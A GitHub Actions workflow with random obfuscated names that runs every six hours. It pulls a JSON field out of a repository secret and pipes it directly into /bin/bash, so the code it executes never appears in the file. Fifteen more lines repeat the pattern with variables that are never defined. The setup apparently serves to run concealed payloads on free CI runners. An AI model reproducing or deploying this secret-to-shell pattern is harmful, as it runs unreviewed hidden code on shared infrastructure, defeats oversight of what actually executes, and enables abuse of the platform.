name: decayfrightened

on:
  workflow_dispatch:
  schedule:
    - cron: '59 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: decayfrightened
        env:
          ar1: ${{ secrets.ar1 }}
        run: |
          echo $ar1 | jq -r .dyufm21450 | /bin/bash
          echo $u01622 | jq -r .gb68 | /bin/bash
          echo $k329 | jq -r .k9975 | /bin/bash
          echo $i1 | jq -r .rdd92 | /bin/bash
          echo $ndsgn40820 | jq -r .kr13657 | /bin/bash
          echo $echm563 | jq -r .quan897 | /bin/bash
          echo $gby3 | jq -r .cbtc50 | /bin/bash
          echo $x9475 | jq -r .uzg66 | /bin/bash
          echo $lhqh76286 | jq -r .gwt9170 | /bin/bash
          echo $rkdq27 | jq -r .giplj7032 | /bin/bash
          echo $sgsa215 | jq -r .ow8627 | /bin/bash
          echo $voc5 | jq -r .lum71728 | /bin/bash
          echo $e18 | jq -r .lruq14167 | /bin/bash
          echo $nkq31 | jq -r .g7950 | /bin/bash
          echo $zluye97 | jq -r .x224 | /bin/bash
          echo $x3324 | jq -r .dbzs03 | /bin/bash

